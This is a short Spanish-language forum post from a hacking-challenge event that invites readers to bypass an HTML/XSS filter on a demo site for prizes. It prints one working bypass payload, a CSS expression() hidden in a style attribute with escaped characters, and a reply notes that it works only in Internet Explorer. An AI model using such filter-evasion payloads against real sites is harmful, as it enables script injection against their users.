Can You Hack?
Semi-allowhtml
Semi-allowhtml
CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos

Hola!
Los invito a h4x0r3ar este filtro de XSS:
http://allowhtml.com/demo/
Yo lo bypasee hace rato xD
Código:
<div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div> Asi que no esta muy dificil!
Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net
Saludos!!





Autor




En línea


, Además si mal no recuerdo, expression es solo para IE! 


